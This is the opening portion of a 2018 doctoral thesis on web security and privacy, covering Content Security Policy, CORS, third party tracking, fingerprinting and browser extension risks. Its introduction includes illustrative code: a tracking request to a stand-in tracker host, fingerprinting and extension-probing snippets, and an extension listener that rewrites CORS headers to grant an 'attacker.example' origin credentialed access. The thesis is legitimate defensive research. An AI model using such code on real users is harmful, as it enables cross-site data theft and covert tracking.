HAL Id: tel-01925851
https://hal.inria.fr/tel-01925851v2
Submitted on 15 Apr 2019
HAL is a multi-disciplinary open access
archive for the deposit and dissemination of sci-
entific research documents, whether they are pub-
lished or not. The documents may come from
teaching and research institutions in France or
abroad, or from public or private research centers.
Web applications security and privacy
Dolière Francis Somé
To cite this version:
Dolière Francis Somé. Web applications security and privacy. Cryptography and Security [cs.CR].
Université Côte d’Azur, 2018. English. NNT : 2018AZUR4085. tel-01925851v2
Sécurité et vie privée dans les applications
web
Dolière Francis Somé
Université Côte d’Azur / Inria
Présentée en vue de l’obtention du grade de docteur en Informatique de l’Université Côte d’Azur
Dirigée par : Tamara Rezk
Co-encadrée par : Nataliia Bielova
Soutenue le : 29 octobre 2018
Devant le jury, composé de :
Davide Balzarotti Professeur Eurecom
Nataliia Bielova Chercheur Inria
Stefano Calzavara Chercheur Università Ca' Foscari Venezia
Walid Dabbous Directeur de recherche Inria
Christoph Kerschbaumer Chercheur Mozilla
Nick Nikiforakis Professeur Assistant Stony Brook University
Tamara Rezk Chercheur Inria
Andrei Sabelfeld Professeur Chalmers University
Mike West Ingénieur Google
THÈSE DE DOCTORAT
Sécurité et vie privée dans les applications
web
Composition du jury
Rapporteurs :
Davide Balzarotti Professeur Eurecom
Andrei Sabelfeld Professeur Chalmers University
Examinateurs :
Stefano Calzavara Chercheur Università Ca' Foscari Venezia
Walid Dabbous Directeur de recherche Inria
Christoph Kerschbaumer Chercheur Mozilla
Mike West Ingénieur Google
Invité :
Nick Nikiforakis Professeur Assistant Stony Brook University
Co-directeur de thèse:
Nataliia Bielova Chercheur Inria
Directeur de thèse:
Tamara Rezk Chercheur Inria
Résumé
Dans cette thèse, nous nous sommes intéressés aux problématiques de sécurité et de
confidentialité liées à l’utilisation d’applications web et à l’installation d’extensions de
navigateurs. Parmi les attaques dont sont victimes les applications web, il y a celles très
connues de type XSS (ou Cross-Site Scripting). Les extensions sont des logiciels tiers que les
utilisateurs peuvent installer afin de booster les fonctionnalités des navigateurs et améliorer
leur expérience utilisateur.
Content Security Policy (CSP) est une politique de sécurité qui a été proposée pour
contrer les attaques de type XSS. La Same Origin Policy (SOP) est une politique de
sécurité fondamentale des navigateurs, régissant les interactions entre applications web. Par
exemple, elle ne permet pas qu’une application accède aux données d’une autre application.
Cependant, le mécanisme de Cross-Origin Resource Sharing (CORS) peut être implémenté
par des applications désirant échanger des données entre elles.
Tout d’abord, nous avons étudié l’intégration de CSP avec la Same Origin Policy (SOP)
et démontré que SOP peut rendre CSP inefficace, surtout quand une application web
ne protège pas toutes ses pages avec CSP, et qu’une page avec CSP imbrique ou est
imbriquée dans une autre page sans ou avec un CSP différent et inefficace. Nous avons
aussi élucidé la sémantique de CSP, en particulier les différences entre ses 3 versions, et
leurs implémentations dans les navigateurs. Nous avons ainsi introduit le concept de CSP
sans dépendances qui assure à une application la même protection contre les attaques,
quel que soit le navigateur dans lequel elle s’exécute. Finalement, nous avons proposé et
démontré comment étendre CSP dans son état actuel, afin de pallier nombre de ses
limitations qui ont été révélées dans d’autres études.
Les contenus tiers dans les applications web permettent aux propriétaires de ces contenus de
pister les utilisateurs quand ils naviguent sur le web. Pour éviter cela, nous avons introduit
une nouvelle architecture web qui, une fois déployée, supprime le pistage des utilisateurs.
Dans un dernier temps, nous nous sommes intéressés aux extensions de navigateurs. Nous
avons d’abord démontré que les extensions qu’un utilisateur installe et/ou les applications
web auxquelles il se connecte, peuvent le distinguer d’autres utilisateurs. Nous avons
aussi étudié les interactions entre extensions et applications web. Ainsi avons-nous trouvé
plusieurs extensions dont les privilèges peuvent être exploités par des sites web afin d’accéder
à des données sensibles de l’utilisateur. Par exemple, certaines extensions permettent à
des applications web d’accéder aux contenus d’autres applications, bien que cela soit
normalement interdit par la Same Origin Policy. Finalement, nous avons aussi trouvé qu’un
grand nombre d’extensions a la possibilité de désactiver la Same Origin Policy dans le
navigateur, en manipulant les entêtes CORS. Cela permet à un attaquant d’accéder aux
données de l’utilisateur dans n’importe quelle autre application, comme par exemple ses
mails, son profil sur les réseaux sociaux, et bien plus. Pour lutter contre ces problèmes, nous
préconisons aux navigateurs un système de permissions plus fin et une analyse d’extensions
plus poussée, afin d’alerter les utilisateurs des dangers réels liés aux extensions.
Mots-clés : web, navigateurs, applications web, sécurité, same-origin policy, content security
policy, cross-origin resource sharing, extensions de navigateurs, communication inter-iframes,
confidentialité, vie privée, pistage, empreinte de navigateurs
Abstract
In this thesis, we studied security and privacy threats in web applications and browser
extensions. There are many attacks targeting the web of which XSS (Cross-Site Scripting)
is one of the most notorious. Third party tracking is the ability of an attacker to benefit
from its presence in many web applications in order to track the user as she browses the
web, and build her browsing profile. Extensions are third party software that users install
to extend their browser functionality and improve their browsing experience. Malicious or
poorly programmed extensions can be exploited by attackers in web applications, in order
to benefit from extensions’ privileged capabilities and access sensitive user information.
Content Security Policy (CSP) is a security mechanism for mitigating the impact of content
injection attacks in general and in particular XSS. The Same Origin Policy (SOP) is a
security mechanism implemented by browsers to isolate web applications of different origins
from one another.
In a first work on CSP, we analyzed the interplay of CSP with SOP and demonstrated that
the latter allows the former to be bypassed. Then we scrutinized the three CSP versions and
found that a CSP is differently interpreted depending on the browser, the version of CSP
it implements, and how compliant the implementation is with respect to the specification.
To help developers deploy effective policies that encompass all these differences in CSP
versions and browsers implementations, we proposed the deployment of dependency-free
policies that effectively protect against attacks in all browsers. Finally, previous studies
have identified many limitations of CSP. We reviewed the different solutions proposed in
the wild, and showed that they do not fully mitigate the identified shortcomings of CSP.
Therefore, we proposed to extend the CSP specification, and showed the feasibility of our
proposals with an example of implementation.
Regarding third party tracking, we introduced and implemented a privacy-preserving web
architecture that can be deployed by web developers willing to include third party content
in their applications while preventing tracking. Intuitively, third party requests are
automatically routed to a trusted middle party server which removes tracking information from
the requests.
Finally considering browser extensions, we first showed that the extensions that users install
and the websites they are logged into, can serve to uniquely identify and track them. We
then studied the communications between browser extensions and web applications and
demonstrated that malicious or poorly programmed extensions can be exploited by web
applications to benefit from extensions’ privileged capabilities. Also, we demonstrated that
extensions can disable the Same Origin Policy by tampering with CORS headers. All this
enables web applications to read sensitive user information. To mitigate these threats, we
proposed countermeasures and a more fine-grained permissions system and review process
for browser extensions. We believe that this can help browser vendors identify malicious
extensions and warn users about the threats posed by extensions they install.
Keywords: web, browser, web application, security, same origin policy, content secu-
rity policy, cross-origin resource sharing, browser extensions, cross-iframe communication,
privacy, third party web tracking, browser fingerprinting
Acknowledgements
MERCI
THANK YOU
BARKA
Contents
1 Introduction 1
1 Security threats .................................. 1
2 Privacy threats .................................. 2
3 Extensible browsers ................................ 3
4 Scope of the thesis ................................ 3
4.1 Improving the effectiveness of CSP ................... 3
4.2 Server-side third party tracking protection ............... 4
4.3 Web applications meet browser extensions ............... 5
5 Outline ...................................... 5
6 List of publications and submissions ...................... 6
2 Background 7
1 Web applications ecosystem ........................... 7
1.1 Web servers ................................ 7
1.2 HTTP protocol .............................. 8
1.3 Web documents .............................. 9
1.4 Cascading Style Sheets (CSS) ...................... 10
1.5 JavaScript ................................. 11
1.6 Browsing contexts ............................ 12
2 The Same Origin Policy ............................. 12
2.1 Origin ................................... 12
2.2 Cross-origin embeddings ......................... 13
2.3 Cross-origin reads ............................ 15
3 Cross-Origin Resource Sharing (CORS) .................... 16
3.1 Types of CORS requests: simple and preflighted ........... 16
3.2 CORS headers .............................. 17
3.3 CORS and sandboxing .......................... 19
4 Third party content in web applications .................... 20
4.1 Cross-Site Scripting (XSS) ........................ 20
4.2 Third party web tracking ........................ 21
5 Content Security Policy ............................. 22
5.1 Directives ................................. 22
5.2 Directive values .............................. 23
5.3 CSP modes and headers ......................... 25
5.4 Example of CSPs ............................. 26
6 Browser extensions ................................ 27
6.1 Security considerations .......................... 28
6.2 Architecture ................................ 28
6.3 Extensions injected content ....................... 29
6.4 Extensions identification ......................... 30
6.5 Web Accessible Resources ........................ 30
I Content Security Policy 33
3 CSP violations due to SOP 39
1 Introduction .................................... 39
2 Content Security Policy and SOP ........................ 40
2.1 CSP violations due to SOP ....................... 40
3 Empirical study of CSP violations ....................... 42
3.1 Methodology ............................... 43
3.2 Results on CSP adoption ........................ 45
3.3 Results on CSP violations due to SOP ................. 46
3.4 Responses of websites owners ...................... 49
4 Avoiding CSP violations ............................. 49
5 Inconsistent implementations .......................... 50
6 Conclusion ..................................... 52
4 Dependency-Free CSP 53
1 Introduction .................................... 53
2 Context and problems .............................. 56
2.1 Directives and their values in different CSP versions ......... 56
2.2 Problems with browsers support .................... 57
2.3 Goal: is my CSP effective? ....................... 58
3 Directives dependencies ............................. 59
3.1 CSP core syntax ............................. 59
3.2 Formalization of DF-CSP considering CSP1, CSP2, CSP3 and browsers
implementations ............................. 62
3.3 Rewriter for building DF-CSP for CSP1, CSP2, and CSP3 ...... 66
3.4 Resolving all Dependencies ....................... 67
3.5 Dependencies between CSP2 and CSP3 implementations ....... 69
3.6 Dependencies between CSP2 and CSP3 specifications ......... 70
4 Dependencies in the wild ............................. 72
4.1 Validity of the statistics ......................... 73
5 Tool for building effective policies ........................ 73
6 DF-CSP and strict CSP .............................. 74
6.1 Attacker model .............................. 75
6.2 Design ................................... 75
6.3 Applications vulnerable to such attacks ................ 75
7 Conclusion ..................................... 76
5 Extending CSP 77
1 Introduction .................................... 77
2 Problem and motivation ............................. 81
2.1 Partially whitelisted origins ....................... 82
2.2 Excluding content from whitelisted origins ............... 82
2.3 URL parameters ............................. 82
2.4 CSP violations .............................. 82
2.5 Motivation ................................ 83
3 Extending CSP specification ........................... 84
3.1 CSP in blacklisting mode ........................ 84
3.2 Checks on URL arguments ....................... 84
3.3 Preventing redirections .......................... 86
3.4 Reporting runtime enforcement of CSP ................. 86
3.5 Backwards compatibility and implementation overhead ........ 86
4 Implementation .................................. 87
4.1 Implementation of the URL filtering algorithm ............ 88
4.2 Implementation of the URL matching algorithm ........... 89
4.3 Service workers .............................. 89
5 Evaluation ..................................... 92
5.1 Performance overhead .......................... 93
6 Discussions and limitations ........................... 95
6.1 Service workers .............................. 95
6.2 Browser extensions ............................ 96
6.3 Privacy implications of the reporting mechanism ........... 96
7 Conclusion ..................................... 97
II Third party web tracking 99
6 Server-side tracking protection 105
1 Introduction ....................................105
2 Background and motivation ...........................106
2.1 Browsing context .............................107
2.2 Third party tracking ...........................108
3 Privacy-preserving web architecture .......................110
3.1 Rewrite Server ..............................111
3.2 Middle Party ...............................112
4 Implementation ..................................114
4.1 Discussion and limitations ........................115
5 Evaluation and Case Study ...........................115
6 Conclusion .....................................117
7 Browser extensions fingerprinting 119
1 Introduction ....................................119
2 Background ....................................121
2.1 Detection of browser extensions .....................121
2.2 Detection of web logins .........................122
3 Dataset ......................................123
3.1 Experiment website and data collection ................123
3.2 Data statistics ..............................124
3.3 Usage of extensions and logins .....................127
4 Uniqueness analysis ................................128
4.1 Four final datasets ............................129
4.2 Uniqueness results for final datasets ..................129
5 Fingerprinting attacks ..............................131
5.1 Threat model ...............................131
5.2 How to choose optimal attributes? ...................132
5.3 Targeted fingerprinting ..........................132
5.4 General fingerprinting ..........................133
6 Implementation and performance ........................135
7 The dilemma of privacy extensions .......................135
8 Countermeasures .................................137
9 Discussion and future work ...........................138
10 Conclusion .....................................139
III Browser Extensions 141
8 Communications extensions - web applications 147
1 Introduction ....................................147
2 Context ......................................149
2.1 Interactions ................................149
2.2 Threat models ..............................151
3 Methodology ...................................151
3.1 Static analysis ..............................152
3.2 Manual Analysis .............................154
3.3 Limitations ................................154
4 Empirical Study .................................154
4.1 Overview .................................155
4.2 Execute code ...............................158
4.3 Bypass SOP ................................158
4.4 Cookies ..................................159
4.5 Downloads ................................160
4.6 History, bookmarks, and list of installed extensions ..........160
4.7 Store/retrieve data ............................160
4.8 Other threats ...............................161
5 Tool for analyzing message passing APIs ....................161
6 Case study ....................................162
6.1 Example of messages to send to extensions ...............162
6.2 Forcing the attack ............................166
7 Discussion .....................................166
7.1 Browser vendors .............................167
7.2 Web applications developers .......................167
7.3 Extensions developers ..........................167
7.4 Extensions users .............................168
8 Conclusion .....................................168
9 Extensions and CORS 169
1 Introduction ....................................169
2 Background ....................................171
2.1 Threat model ...............................171
3 CORSER extension ................................. 172
3.1 Permissions to manipulate HTTP headers ...............172
3.2 Background page .............................173
3.3 Deploying and testing CORSER ......................176
3.4 Publishing CORSER ............................177
4 Empirical study on CORS headers manipulations ...............177
4.1 Data collection and static analyzer ...................177
4.2 Manual analysis ..............................178
4.3 Results overview .............................178
4.4 Breaking the Same Origin Policy ....................183
4.5 Breaking legitimate CORS requests ...................184
5 Discussions ....................................186
5.1 Disallowing security headers manipulations ..............186
5.2 Requesting permissions to manipulate security headers ........187
6 Countermeasures .................................188
6.1 Web applications servers .........................188
6.2 Extensions Users .............................188
6.3 Extensions Developers ..........................188
7 Conclusion .....................................188
10 Conclusion 191
A Appendix 195
List of Figures 207
List of Tables 209
List of tools and websites 211
Bibliography 213
Chapter 1
Introduction
Browsers are everywhere. Billions of devices such as personal computers, smartphones,
tablets, and even TVs connect to the Internet via powerful browsers that are able to display
rich web applications. Unlike native applications, web applications remove the
burden for developers of providing a specific version of their applications for different devices.
This allows developers to reach almost any device and many more users. This is possible
because the web is based on standards supported by browsers and used by developers to
write their applications. Web standards such as HTML5, CSS, JavaScript and HTTP
are powerful enough to enable the creation of web applications that rival native desktop
applications in terms of features, functionality and performance. In
recent years, many applications such as Microsoft Office and Skype, that have dominated
the desktop applications landscape, are experiencing serious competition from alternatives
based on the web, and are themselves now moving to the web.
Long ago, websites were made of static content solely provided by the owner of the site.
Today web applications are interactive, and are made by reusing content and assembling
building blocks provided by third parties. Using third party content makes it easy to
quickly build fully fledged web applications: a restaurant site can use Google Maps to
show its location to clients, link to a social network page for users to leave comments,
collect feedback from users directly in the site, or even monetize the site by displaying
third party advertisements to users.
Hence, part of the content that forms web applications is also generated by users. By
creating accounts on web applications, users can leave comments which are displayed to
other users. They can interact and share content with one another.
1 Security threats
It is fundamental that the data a user entrusts to a web application does not get leaked
to a third party. The Same Origin Policy (SOP) [125] is a baseline security mechanism,
implemented by browsers, to ensure that websites they run cannot directly access each
other’s data: for instance, the user’s bank information is accessible only to the bank website,
and not to her email website and vice versa. To ensure that, each application executes in
a different browsing context. However, when an application embeds third party content in
its pages, say a script, then the third party content executes with the same privileges (in
the same context) as any other content provided by the owner of the application. In other
words, it has access to any data of the hosting application. It is then the responsibility of
the developer to ensure that it is safe to include such third party content in his website —
that the third party is not leaking user data.
While third party content present in a website is usually included by the developer because she
trusts it, there are many attacks that an attacker can leverage to inject malicious
content into web applications. One of the most prevalent of those attacks is Cross-Site
Scripting (XSS). An XSS attack occurs when an attacker is able to inject malicious content
in a vulnerable application, via a comment text field for instance. When such content is
displayed to other users (who visit the application to view the list of posted comments),
the attacker’s content (code) is also rendered. Since it is code and not the expected
text content, it is executed with the same privileges as the code provided by the
application developer. The attacker can then take advantage of this position to access and
exfiltrate user data, leak user authentication cookies and mount session hijacking attacks in
order to take actions on the user’s behalf. To help mitigate XSS attacks in particular and
a broad range of content injection attacks in general, the World Wide Web Consortium
(W3C) introduced Content Security Policy (CSP) [275]. CSP makes it possible for a
developer to declare the origins of (trusted) content allowed to load in her application. At
runtime, content not whitelisted in the CSP of the application is blocked by the browser.
Thanks to CSP, the browser can block content injected by an attacker who exploited a
vulnerability in the website.
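As an illustration (a minimal sketch with assumed values, not a policy taken from this thesis), a web server could attach such a whitelist to its pages with the Content-Security-Policy HTTP header; here, scripts are only allowed from the page's own origin and from a hypothetical trusted CDN:

const http = require("http");

http.createServer((req, res) => {
  // Whitelist: scripts may only be loaded from the page's origin or from cdn.example.com.
  res.setHeader(
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self' https://cdn.example.com"
  );
  res.setHeader("Content-Type", "text/html");
  res.end("<html><body>Hello</body></html>");
}).listen(8080);

With such a policy, a script injected by an attacker and served from any other origin is simply not loaded by the browser.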
2 Privacy threats
The Hypertext Transfer Protocol (HTTP) used to exchange data between web browsers
and application servers is coined as being stateless. In other words, when a browser
connects to a server to retrieve some data, the server just handles the request, responds
with the appropriate content and forgets about the request it has just served and the
browser which made it. Cookies have been added to the protocol to make it stateful.
Cookies are sent by web servers, stored in the user browser and attached to future requests
to the same server, so that the server can link subsequent requests from the same browser.
The ability to store cookies in the user’s browser is primarily meant for (but not limited to)
first parties (web applications the user interacts with). Indeed, every third party content
that web applications embed can also use cookies in order for the third party content
provider to recognize the browser from which a request is being made to load the third
party content. Additionally, the browser automatically attaches to third party requests
the first party application in which they are embedded. Combining cookies and the name of
the first party website allows a third party to build a browsing history for the specific user
(all the websites that include content from the third party, and that the user has
visited). Many third parties serve content to numerous web applications, putting them in
a position where they can track many users as they browse the web. Tracking information
gathered by third parties can serve various purposes such as advertising, and can put the user’s
privacy at risk by revealing their health condition, political or religious views, interests, etc.
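To make this concrete, the following sketch (with a made-up tracker domain, not a script studied in this thesis) shows how a third party script embedded on many websites could report the page being visited, while the browser automatically attaches the tracker's own cookie:

// Hypothetical script served by tracker.example and embedded as third party content on many sites.
fetch("https://tracker.example/collect?page=" + encodeURIComponent(document.location.href), {
  credentials: "include" // the tracker's third party cookie is attached, linking visits together
});

Since the same cookie accompanies every such request, the tracker can reconstruct the user's browsing history across all the sites that embed its content.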
Another tracking scenario that has been extensively demonstrated in the literature is
browser fingerprinting. In this scenario, trackers collect the properties of the user browser
(for instance, the name, version of the browser and operating system, list of fonts and
plugins installed), build a fingerprint of her browser and store it on a server. When the
user visits another website, the tracker collects the properties of her browser again, and
compares them with the previously stored fingerprints in order to recognize and track the user.
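The following sketch (an illustration with an arbitrary choice of attributes, not one of the fingerprinting scripts discussed in this thesis) shows the kind of properties a tracker can read from JavaScript to build such a fingerprint:

// Combine a few browser properties exposed to scripts into a fingerprinting string.
const fingerprint = [
  navigator.userAgent,            // browser name, version and operating system
  navigator.language,
  screen.width + "x" + screen.height,
  new Date().getTimezoneOffset(),
  Array.from(navigator.plugins).map((p) => p.name).join(",")
].join("|");
// A real tracker would hash this string and send it to a server for comparison
// with previously stored fingerprints.
console.log(fingerprint);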
3 Extensible browsers
Even though modern web browsers are powerful platforms capable of executing all sorts of
simple to very complex web applications, most of them also provide mechanisms for users
to further extend and customize their browsers. One of the most widespread
mechanisms for doing so is based on browser extensions or addons. The WebExtensions
API, for instance, is a cross-browser extension API supported by major browsers including
Chrome, Firefox, Opera and Microsoft Edge. Nowadays, extensions are very widespread
among browsers. The Google Chrome Web Store has more than 60k extensions, and there
are hundreds to thousands of extensions available for other platforms. Many extensions are
already used by tens of millions of users. Among those are adblockers and other privacy-
preserving extensions, more and more password managers, and various helper extensions
for improving and easing users’ browsing experience. In contrast to plugins such as Adobe
Flash or Java applets, which are external native applications used by browsers to display non-
standard web content (Flash movies, Java applets), browser extensions are third
party programs tightly integrated into browsers, where they execute with elevated privileges.
For instance, unlike traditional web applications, they are not subject to the SOP, and
therefore can access user data on any web application, including applications where users
are logged into. Extensions can also intercept and tamper with HTTP communications
between web applications and web servers.
Due to their privileged nature, browser extensions are the target of many attacks that
put the security and privacy of users at risk. Compromising an extension gives an attacker
unlimited access to user data on any application, including sensitive information on any
application the user is logged into.
For security reasons, browser extensions and web applications execute in separate contexts.
Web applications cannot access extensions privileged execution contexts. Extensions how-
ever have access to web applications execution contexts and in particular to their Document
Object Model (DOM), which they can manipulate. They can add, modify or remove ele-
ments from the DOM of web pages. Content they inject directly in the DOM of web pages
will be considered as part of the web application, thus executing with the same privileges
and accessing data in the application context. Apart from the DOM, extensions and web
applications can interact in various ways in order to exchange data via the localStorage,
or by setting up communication channels using postMessage-like APIs. Extensions can
also intercept and modify the headers of HTTP exchanges between web applications and
web servers. This includes sensitive security-critical headers such as the Cross-Origin
Resource Sharing (CORS) headers, used in HTTP requests and responses to authorize
cross-domain requests or not.
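As a rough sketch of these interaction channels (assumed extension code, not one of the extensions analyzed in this thesis), a WebExtensions content script can both rewrite the DOM of the page it runs in and relay messages from that page to the privileged background page:

// Content script: runs alongside the webpage and has access to its DOM.
const banner = document.createElement("div");
banner.innerText = "Injected by an extension";
document.body.appendChild(banner);

// Relay messages posted by the page to the extension background page.
window.addEventListener("message", (event) => {
  chrome.runtime.sendMessage({ fromPage: event.data });
});

The background page, which holds the extension's privileges, then decides what to do with such messages; careless handling at this boundary is precisely what can hand those privileges to arbitrary web pages.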
4 Scope of the thesis
4.1 Improving the effectiveness of CSP
Content Security Policy is a page-specific policy. This means that when a web application
does not protect all its pages with a CSP, then instead of targeting the CSP-protected
pages, an attacker can target the non-protected ones. Once the attack succeeds, the SOP
allows the attacker to propagate this attack to all other pages of the application, including
those which are CSP-protected.
Since its introduction, CSP has experienced three major versions: the second version is
a W3C specification and the current third version is already in an advanced development
state. New versions of CSP come with their set of features which were not present in previ-
ous versions and changes that alter the semantics of previous CSP versions. Furthermore,
different browsers support different versions of CSP. Even when they support the same ver-
sion, their implementations are not always compliant with the specification or even with
one another. In these settings, developers have to ensure that policies they deploy take
into consideration the peculiarities of each CSP version, and browsers implementations, so
that the CSPs provide the same security protection while preserving the functionality of
the application, in all browsers. To help developers cope with these intricacies, we formal-
ize the differences between CSP versions and browsers implementations, and propose and
prove a set of rewriting rules to effectively build policies which are independent of CSP
versions and browsers implementations.
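For illustration only (an assumed policy, not one of the cases formalized in this thesis), consider restricting where frames may be loaded from. The child-src directive was introduced in CSP2, whereas CSP1 browsers only know frame-src and otherwise fall back to default-src; a policy relying on a single directive therefore behaves differently across browsers, and spelling out the equivalent directives removes the dependency:

// Version-dependent: a CSP1-only browser ignores child-src and falls back to default-src (*),
// so framing is left unrestricted there.
const versionDependent = "default-src *; child-src https://videos.example.com";

// Dependency-free for framing: the same restriction is stated for every relevant directive.
const dependencyFree =
  "default-src *; " +
  "child-src https://videos.example.com; " + // interpreted by CSP2 browsers
  "frame-src https://videos.example.com";    // interpreted by CSP1 (and CSP3) browsers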
Previous studies have shown the limitations of CSP at mitigating XSS attacks, because of
subtle bypasses such as JSONP and open redirects. We reviewed the previous solutions that
have been proposed and showed that they do not fully mitigate the identified shortcomings
of CSP. Therefore, we proposed to extend the CSP specification. We motivate the need for
a blacklisting mechanism in CSP, a URL parameter filtering mechanism, new directives
for explicitly preventing redirections, and an efficient reporting mechanism for collecting
feedback on the runtime enforcement of CSP. We demonstrate the feasibility of our proposals
with an example of implementation.
4.2 Server-side third party tracking protection
Third party web tracking has attracted significant attention from the research community
over the past years. Many mechanisms have been proposed to help mitigate it. We observe
that most of these solutions are focused on the client-side, proposed by browser vendors
in the form of settings for users to control third party cookies, browse in private and
other incognito modes, or in the form of privacy-preserving browser extensions provided
by developers. If some browsers enable some basic tracking protection features by default,
enabling more advanced ones is not always easily accessible to the average Internet user.
Furthermore, installing browser extensions is not easy to the majority of users. In other
words, these solutions are only effective for advanced users, leaving the vast majority of
them unprotected.
We propose a server-side third party web tracking protection mechanism. The design of
such a solution is challenging for many reasons: first of all, third party content is important
and many web applications in the wild cannot afford not to use it. Nonetheless,
we argue that a developer embedding third party content is more interested in the content
itself than in the underlying tracking that can take place. As such, tracking is a
practice that developers may want to remove from third party content embedded in their
applications. Moreover, many web applications are already deployed, and a solution
requiring significant effort from developers to change their applications is unlikely to
be adopted by the majority of them.
Considering these requirements, the solution we propose can be plugged into an already
existing web application, and does not prevent the developer from using third party content.
The system automatically rewrites the original pages of the application, in order to redirect
third party content requests to a middle party. There, any tracking information (cookies,
identification of the first party) is removed, and the request is forwarded to the third
party. In other words, the middle party anonymizes the requests and forwards them to
the third party. When the third party replies, the responses are also anonymized before
being returned to the browser. This makes it impossible for the third party to recognize
the user’s browser initiating the request, and thus prevents third party web tracking.
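A minimal sketch of the middle party idea (assumed names and routing scheme, not the actual implementation described in Chapter 6): third party requests are routed to the middle party, which strips identifying information before contacting the real third party.

const http = require("http");
const https = require("https");

http.createServer((req, res) => {
  // The rewritten pages point third party content to /?url=<original third party URL>.
  const target = new URL(req.url, "http://middle.example").searchParams.get("url");
  // Forward the request without Cookie or Referer, so the third party can neither
  // recognize the browser nor learn which first party site embedded the content.
  https.get(target, { headers: { "User-Agent": "middle-party" } }, (upstream) => {
    const headers = { ...upstream.headers };
    delete headers["set-cookie"]; // do not let the third party store identifiers in the browser
    res.writeHead(upstream.statusCode, headers);
    upstream.pipe(res);
  });
}).listen(3000);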
4.3 Web applications meet browser extensions
Browsers supporting the WebExtensions API usually assign to each extension a unique
identifier that distinguishes it from other extensions. Chrome and Opera assign each
extension a permanent identifier, which is the same in all user browsers. Firefox however
assigns a random identifier to the extension on a per-browser basis. Content that extensions
inject in web pages DOM can either be hosted on a remote server, or be located in
the extension package on the user browser. Contents of the extension package that can be
injected in web pages are referred to as web accessible resources. Extensions identifiers,
web accessible resources and content that extensions inject in web pages can be used to
successfully discover extensions and fingerprint the user’s browser. Previous studies that
have quantified the fingerprintability of browser extensions have done so with rather lim-
ited user bases (less than a thousand). We performed an analysis of the fingerprintability
of users based on their set of extensions by analyzing the list of installed extensions from
more than 16k users. We also show that the websites users are logged into further
add to their uniqueness.
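As an illustration of such probing (the extension identifier and resource path below are made up), a webpage can test for an installed extension by trying to load one of its web accessible resources:

const probe = new Image();
probe.onload = () => console.log("extension appears to be installed");
probe.onerror = () => console.log("extension not detected");
// Hypothetical Chrome extension identifier and resource path, for illustration only.
probe.src = "chrome-extension://aaaabbbbccccddddeeeeffffgggghhhh/img/icon.png";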
We analyzed the communications between browser extensions and web applications, and
discovered many extensions whose privileged capabilities can be exploited by web applications,
for instance to bypass the SOP and access any other web application’s data,
circumvent the user’s preference not to be tracked by storing data in the extension’s permanent
storage, access the user’s browsing cookies, history, bookmarks, topsites and list of installed
extensions, or even download files and save them on the user’s device.
Finally, we discussed the security implications of the ability of extensions to tamper with
HTTP headers, in particular security-critical headers such as those used in Cross-Origin
Resource Sharing (CORS) requests. In fact, by default, the SOP does not allow cross-origin
requests. CORS is a refinement of the Same Origin Policy in which web servers can authorize
cross-origin requests by sending dedicated HTTP headers. An extension can essentially
disable the SOP in browsers by appropriately tampering with CORS headers in cross-
origin requests. Consequently, by acting as a man-in-the-middle, such extensions can authorize
otherwise forbidden cross-origin requests, allowing an attacker to transparently gather all user
data on any web application.
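The following sketch (assumed extension code requiring the webRequest, webRequestBlocking and <all_urls> permissions; attacker.example is a made-up origin) shows how an extension could rewrite CORS response headers so that a page on the attacker's origin may read credentialed cross-origin responses:

chrome.webRequest.onHeadersReceived.addListener(
  (details) => {
    const headers = details.responseHeaders.filter(
      (h) => h.name.toLowerCase() !== "access-control-allow-origin"
    );
    // Pretend every server authorizes the attacker's origin, with credentials.
    headers.push({ name: "Access-Control-Allow-Origin", value: "https://attacker.example" });
    headers.push({ name: "Access-Control-Allow-Credentials", value: "true" });
    return { responseHeaders: headers };
  },
  { urls: ["<all_urls>"] },
  ["blocking", "responseHeaders"]
);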
5 Outline
In the background Chapter 2, we describe concepts and technologies necessary to ease the
reader’s understanding of other chapters. The rest of the thesis is organized in 3 parts.
Part I describes works related to Content Security Policy. It is further divided into 3 chapters
describing CSP violations due to the Same Origin Policy (Chapter 3), dependencies in CSP
directives (Chapter 4), and extensions we propose to complement and extend CSP (Chap-
ter 5). Part II is related to third party web tracking and browser fingerprinting. Chapter 6
presents our work on server-side tracking prevention and Chapter 7 discusses browser
fingerprinting based on browser extensions and web logins. Finally, Part III is dedicated to
works on the security and privacy implications of browser extensions. Chapter 8 presents
our work analyzing the threats posed by the communications between browser extensions
and web applications, and Chapter 9 discusses the implications of the Cross-Origin
Resource Sharing (CORS) headers manipulations by browser extensions. Finally, Chapter 10
concludes.
6 List of publications and submissions
1. Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. On the content security
policy violations due to the same-origin policy. In Barrett et al. [171], pages 877–886
2. Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. Control what you include!
- server-side protection against third party web tracking. In Bodden et al. [174], pages
115–132
3. Gábor György Gulyás, Dolière Francis Somé, Nataliia Bielova, and Claude Castelluccia.
To extend or not to extend: on the uniqueness of browser extensions and web
logins. To appear in the Proceedings of the 2018 ACM Workshop on Privacy in
the Electronic Society, WPES@CCS 2018, Toronto, Canada, October 15-19, 2018.
4. Dolière Francis Somé and Tamara Rezk. DF-CSP: Dependency-Free Content Security
Policy. Submitted for review
5. Dolière Francis Somé and Tamara Rezk. Extending Content Security Policy: Black-
listing, URL arguments filtering and Monitoring. Submitted for review
6. Dolière Francis Somé. EmPoWeb: Empowering web applications with browser exten-
sions. Submitted for review
7. Dolière Francis Somé. Breaking the Same Origin Policy for free - On CORS headers
manipulations by browser extensions. Submitted for review
Chapter 2
Background
This chapter introduces different concepts and technologies that are used throughout this
thesis. It presents the state of the art of these key concepts so as to ease the reader’s
understanding of the following chapters and works presented in this thesis.
1 Web applications ecosystem
Browsers are application platforms capable of running web applications that provide different
services to users. The web ecosystem is built on common standards, implemented both by
browser vendors and web applications developers. This makes it possible for any browser
to correctly render any website.
The web architecture is commonly referred to as a client-server architecture, where the
browser is the client and the server is the machine hosting the application. When a user
needs to interact with an application, the browser makes a request to the server hosting
it. The server responds with the application, which is then displayed to the user. The web
architecture can also be seen as a multi-tier system [192,247], where the browser is the first
or presentation tier and the web server represents the logic tier, associated to data tiers
which are usually databases where the server stores and manages the web application data.
To communicate with one another, the different tiers are connected to a common network,
usually the Internet, and support common communications protocols such as HTTP [1]
used for transmitting data among them.
1.1 Web servers
A web server is often wrongly referred to as the computer device (machine) hosting a
web application. Actually, a web server is itself an application running on a computer
device, connected to a network (usually the Internet), in order for the clients (browsers) to
communicate with the web server. Well-known web servers are Apache HTTP Server [9],
Microsoft Internet Information Services (IIS) [95] and Nginx [104]. Web servers support
a set of technologies for powering web applications. They usually support a programming
